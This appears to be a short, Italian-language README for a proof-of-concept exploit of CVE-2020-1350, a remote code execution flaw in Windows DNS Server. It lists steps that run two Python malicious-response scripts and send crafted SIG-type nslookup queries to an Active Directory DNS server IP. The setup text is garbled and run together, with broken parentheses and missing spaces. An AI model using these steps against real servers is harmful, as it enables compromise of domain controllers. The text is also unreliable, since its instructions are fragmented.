
Exploit proof-of-concept per CVE-2020-1350, una vulnerabilità critica di esecuzione remota di codice in Windows DNS Server. Dimostra lo sfruttamento tramite query DNS appositamente predisposte.
CVE-2020-1350 Prova di concetto
33y0re.com)blah è 0x4 byte e .net è 0x3 byte)domain_correct su \x04blah\03net\x00python UDP_Response.py & python TCP_Response.pynslookup -type=sig 33y0re.com ACTIVE_DIRECTORY_DNS_SERVER_IP seguito da: nslookup -type=sig 9.MALICIOUS_DOMAIN_FROM_LINUX_BOX_SCRIPT ACTIVE_DIRECTORY_DNS_SERVER_IP